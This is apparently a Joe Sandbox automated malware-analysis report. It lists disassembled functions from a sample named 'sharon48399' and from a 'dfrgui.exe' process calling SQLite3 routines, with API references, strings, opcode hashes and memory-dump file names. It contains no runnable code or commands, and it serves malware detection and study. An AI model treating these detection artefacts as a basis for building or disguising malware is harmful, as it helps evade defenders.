RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C722FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00C7220E
RTL: Resource at %p, xrefs: 00C7221D, 00C7230B
RTL: Re-Waiting, xrefs: 00C7223A, 00C72328

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 7658c298de51708af28545336544b444ab2e43ad42dffc5675fdd7f3d67a18c7
Instruction ID: c1ec00ca185205f9c2ccce5a4bba8e905b434420b28c32499d5a5083ff0859ea
Opcode Fuzzy Hash: 7658c298de51708af28545336544b444ab2e43ad42dffc5675fdd7f3d67a18c7
Instruction Fuzzy Hash: 4F513B757002416BEB24CA18CCC1FA633A9AF95721F21C269FD58DB2C6EA31ED819794

Function 00C514C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C7EA22

Part of subcall function 00C513CB: ___swprintf_l.LIBCMT ref: 00C5146B
Part of subcall function 00C513CB: ___swprintf_l.LIBCMT ref: 00C51490

___swprintf_l.LIBCMT ref: 00C5156D

Strings

]:%u, xrefs: 00C7EA47
%%%u, xrefs: 00C51564

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f281fc3981e9c8721160fef5b58459f436761c364c2e2ecd64fe0c3b2539b19d
Instruction ID: dd5ff2e4d947d5f7d39ea64bf0f4b86a3c9eeffa560286255dbaad001372cdb5
Opcode Fuzzy Hash: f281fc3981e9c8721160fef5b58459f436761c364c2e2ecd64fe0c3b2539b19d
Instruction Fuzzy Hash: 2421E176900219ABCB21EF58CC49BEE73BCFB50711F884161FC56D3140EB70AA989BE1

Function 00CB3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00CB3DF3
___swprintf_l.LIBCMT ref: 00CB3E1D
___swprintf_l.LIBCMT ref: 00CB3E46

Strings

%%%u, xrefs: 00CB3E14
]:%u, xrefs: 00CB3E3D

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 32981fcdc49e2c04c3744e9b6d37747498c455157470877df061dd92e51c5430
Instruction ID: 7b9a0847541f491075ff985f67d100a5070127c5362b9d6b666df3969e0face3
Opcode Fuzzy Hash: 32981fcdc49e2c04c3744e9b6d37747498c455157470877df061dd92e51c5430
Instruction Fuzzy Hash: 0121B072A0025AABCB20AE69CC45AEF77ACDF15754F040526FC15A3141EB70DF44D7E1

Function 00C353A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C722F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C722FC
RTL: Resource at %p, xrefs: 00C7230B
RTL: Re-Waiting, xrefs: 00C72328

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: c36f32bc36d482d21078bc4bf2c765576f86e915832150bf53b66b176252881a
Instruction ID: a632332ad3cfadc1841836daddcf23b4cfb209969dadaa8201d53fafdff57e6c
Opcode Fuzzy Hash: c36f32bc36d482d21078bc4bf2c765576f86e915832150bf53b66b176252881a
Instruction Fuzzy Hash: 705129716007016BDB25DF28CC81FA673ACEF54360F108229FD58DB292EA71EE81D7A4

Function 00C3EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00C724BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00C7248D
RTL: Re-Waiting, xrefs: 00C724FA

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 35c11f5d00b1cd632629c0c3a192c9ad00720d0c2b788ec22036460162ab5471
Instruction ID: 78127b5617042c680cdb0dacbe8d38a882b0bb700f743f28376604e38f499abc
Opcode Fuzzy Hash: 35c11f5d00b1cd632629c0c3a192c9ad00720d0c2b788ec22036460162ab5471
Instruction Fuzzy Hash: A64118B0600204ABCB30DB68DC85FAE77B8EF45320F20C615F5699B2C1D734EA81DB61

Function 00C4FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00C4FD94

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: b3019b0a4da05c281ce3169573e11a8ba1abcc4219039dfd3b645816689a0a39
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 8A919C31D0021AEFDF24DFA9C8456AEBBB4FF55305F24807ED415A62A2E7304B82DB91

Function 00CC5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00CC5DE8

Strings

0, xrefs: 00CC5DBF
$, xrefs: 00CC5D36

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: __aulldvrm
String ID: $$0
API String ID: 1302938615-389342756
Opcode ID: 9b19771da7bcdee99fbe1d1e55e75a274be94c27c1bd2f17b8eab0811bcffff7
Instruction ID: fb6b996b16363b70176a0dc6fe6e7d9bf2dc7b573813dd5ffd8c6ce6539e618b
Opcode Fuzzy Hash: 9b19771da7bcdee99fbe1d1e55e75a274be94c27c1bd2f17b8eab0811bcffff7
Instruction Fuzzy Hash: 61917C30D04B9A9EDF24CFA9C545BEDBBB1AF41310F14469ED8B2A6291C7746BC2CB50

Analysis Process: dfrgui.exePID: 1688, Parent PID: 1980COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	377
Total number of Limit Nodes:	49

Executed Functions

Function 61EACE75 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sqlite3_initialize.SQLITE3 ref: 61EACE9B
sqlite3_free.SQLITE3 ref: 61EACF22
sqlite3_mutex_enter.SQLITE3 ref: 61EACF37
sqlite3_free.SQLITE3 ref: 61EAD162
sqlite3_overload_function.SQLITE3 ref: 61EAD243
sqlite3_errcode.SQLITE3 ref: 61EAD259
sqlite3_errcode.SQLITE3 ref: 61EAD28A
sqlite3_wal_autocheckpoint.SQLITE3 ref: 61EAD35C
sqlite3_errcode.SQLITE3 ref: 61EAD368
sqlite3_close.SQLITE3 ref: 61EAD378
sqlite3_free_filename.SQLITE3 ref: 61EAD392
sqlite3_mutex_leave.SQLITE3 ref: 61EAD3A1

Part of subcall function 61E53F2C: strcmp.MSVCRT ref: 61E53F68
Part of subcall function 61E53F2C: sqlite3_free.SQLITE3 ref: 61E54084

Strings

main, xrefs: 61EAD201
BINARY, xrefs: 61EACFD5, 61EAD041, 61EAD069
kqa, xrefs: 61EAD20E
NOCASE, xrefs: 61EAD091
RTRIM, xrefs: 61EAD0D0

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_errcodesqlite3_free$sqlite3_closesqlite3_free_filenamesqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_overload_functionsqlite3_wal_autocheckpointstrcmp
String ID: BINARY$NOCASE$RTRIM$kqa$main
API String ID: 1008213077-114998471
Opcode ID: c47e88043bc3fa803b35b538b81053e65f5f659772745d13e5f8b462c92b564e
Instruction ID: 32e68a783e5af26b4470a4cd6ef3a8408ce22e1c6608969ead32f662455cc060
Opcode Fuzzy Hash: c47e88043bc3fa803b35b538b81053e65f5f659772745d13e5f8b462c92b564e
Instruction Fuzzy Hash: 37E147B4A083418BEB00DF68C59479ABBE1BF89308F24C86DEC989F395D779D845CB51

Function 61E35333 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E350AA), ref: 61E3534D
sqlite3_vfs_register.SQLITE3 ref: 61E35363

Part of subcall function 61E352D0: sqlite3_initialize.SQLITE3(00000000,?,61E35368), ref: 61E352DB
Part of subcall function 61E352D0: sqlite3_mutex_enter.SQLITE3(00000000,?,61E35368), ref: 61E352F3
Part of subcall function 61E352D0: sqlite3_mutex_leave.SQLITE3(00000000), ref: 61E35325

sqlite3_vfs_register.SQLITE3 ref: 61E35377
sqlite3_vfs_register.SQLITE3 ref: 61E3538B
sqlite3_vfs_register.SQLITE3 ref: 61E3539F

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 3532963230-0
Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction ID: 712f9511f428f8b4dcb8ddc9c25c113282c19a7ccd20c7c0bd5c483e94211975
Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction Fuzzy Hash: 0BF03AB01083459BD700AFA4C60635BBAF5AFC6B08FB1C82CE1948B390DBB5D8419B93

Function 61E53F2C Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 772stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E53F68
sqlite3_free.SQLITE3 ref: 61E54084
sqlite3_free.SQLITE3 ref: 61E540E7
sqlite3_free.SQLITE3 ref: 61E540D9

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_mutex_enter.SQLITE3 ref: 61E5410A
sqlite3_mutex_enter.SQLITE3 ref: 61E5411E
strcmp.MSVCRT ref: 61E54150
sqlite3_mutex_leave.SQLITE3 ref: 61E541A3
sqlite3_mutex_leave.SQLITE3 ref: 61E541B1
sqlite3_free.SQLITE3 ref: 61E541B9
sqlite3_free.SQLITE3 ref: 61E541C7
sqlite3_mutex_leave.SQLITE3 ref: 61E54201
sqlite3_free.SQLITE3 ref: 61E54209
sqlite3_free.SQLITE3 ref: 61E548AB
sqlite3_free.SQLITE3 ref: 61E548B9
sqlite3_mutex_leave.SQLITE3 ref: 61E54906

Strings

@, xrefs: 61E5401D
rnal, xrefs: 61E54578

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
String ID: @$rnal
API String ID: 42632313-826727331
Opcode ID: b8999a34cceb2ef17de6ae6608e8d9b4f965a600a18d0aae74f32105b677ad23
Instruction ID: 76e30e1fa75122c6c9329cbae581ce2684ac659e245915e5ceed22a13a7d401a
Opcode Fuzzy Hash: b8999a34cceb2ef17de6ae6608e8d9b4f965a600a18d0aae74f32105b677ad23
Instruction Fuzzy Hash: 46821570A04259CFEB50CF68C880B89BBF1BF45308F2581EAD8989B352E775D9A5CF51

Function 61E34E91 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E34EC9
sqlite3_config.SQLITE3 ref: 61E34EFD
sqlite3_mutex_leave.SQLITE3 ref: 61E35224

Strings

`Ea, xrefs: 61E35020
`Ha, xrefs: 61E35011
Ma, xrefs: 61E3502F
Ia, xrefs: 61E35002
@La, xrefs: 61E34FF3

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_configsqlite3_mutex_entersqlite3_mutex_leave
String ID: Ma$@La$`Ea$`Ha$Ia
API String ID: 3543594801-3535026728
Opcode ID: 670484cd8e0f5372362e9cd7e8730f13489f1b563355f05a17af1a0bc0746c86
Instruction ID: 02986ced41ae6f744c36690db5bbe67c025af0c4a9420eb8befca02c41ef0098
Opcode Fuzzy Hash: 670484cd8e0f5372362e9cd7e8730f13489f1b563355f05a17af1a0bc0746c86
Instruction Fuzzy Hash: FC916EB0A14BA28FEB009FA5C65535A7AF1FBCA308F24C52DD5548B384E77AC4C5CB52

Function 61E75032 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sqlite_temp_master, xrefs: 61E75068
sqlite_master, xrefs: 61E7504D
unsupported file format, xrefs: 61E75221
@, xrefs: 61E75198
Q{a, xrefs: 61E75070
table, xrefs: 61E7505D
attached databases must use the same text encoding as main database, xrefs: 61E751B9

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID:
String ID: @$Q{a$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$table$unsupported file format
API String ID: 0-3131782637
Opcode ID: e27fcaf8cb7d1ded899c92194b35361d72baf7a4d2c40b10a3d70de6911091c5
Instruction ID: 4fe0bad2932ec59471aef64603f64b52b4be300d90493fd0f0b05993d0caff61
Opcode Fuzzy Hash: e27fcaf8cb7d1ded899c92194b35361d72baf7a4d2c40b10a3d70de6911091c5
Instruction Fuzzy Hash: 30B1F170A042888BEB20CFA9C48079EBBF1BF88318F24C56DD8699B356D775E845CF41

Function 61E4C551 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 61E15474: sqlite3_mutex_try.SQLITE3(?,?,?,61E154F4), ref: 61E15414

memcmp.MSVCRT ref: 61E4C6AB
memcmp.MSVCRT ref: 61E4C6FF
memcmp.MSVCRT ref: 61E4C77E
memcmp.MSVCRT ref: 61E4C9AF

Strings

0, xrefs: 61E4C998

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memcmp$sqlite3_mutex_try
String ID: 0
API String ID: 2794522359-4108050209
Opcode ID: ea5d4aa56c3f9109b8c8d210467982117549646356fd811fee048e735c5a617a
Instruction ID: bc5300d8b5d2aca6a2a18dfe03d3ee03dee41708721acf57a279e802d1fd2cf8
Opcode Fuzzy Hash: ea5d4aa56c3f9109b8c8d210467982117549646356fd811fee048e735c5a617a
Instruction Fuzzy Hash: D6128D70F052558FEB05CFA8E184789BBF1AF48318F25C5A9D845AB356D774EC8ACB80

Function 61E758EB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 61E040F8: sqlite3_strnicmp.SQLITE3 ref: 61E04181

sqlite3_strnicmp.SQLITE3 ref: 61E7596A

Part of subcall function 61E046F9: sqlite3_stricmp.SQLITE3 ref: 61E0472E

Strings

no such table, xrefs: 61E75AF1
no such view, xrefs: 61E75AF6

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_strnicmp$sqlite3_stricmp
String ID: no such table$no such view
API String ID: 2003590506-301769730
Opcode ID: 773e38352b525b26876db6451672806e8596fb94b346909b1f39920593256be2
Instruction ID: 9fbbab534be75fb75dccc7856f966755cc4353bb501223874f02361ee5606b3e
Opcode Fuzzy Hash: 773e38352b525b26876db6451672806e8596fb94b346909b1f39920593256be2
Instruction Fuzzy Hash: 5B712670A083469BEB10DFA8D58076EBBF1AF89318F34C82DE8999B354D774D845CB91

Function 61E13DA6 Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

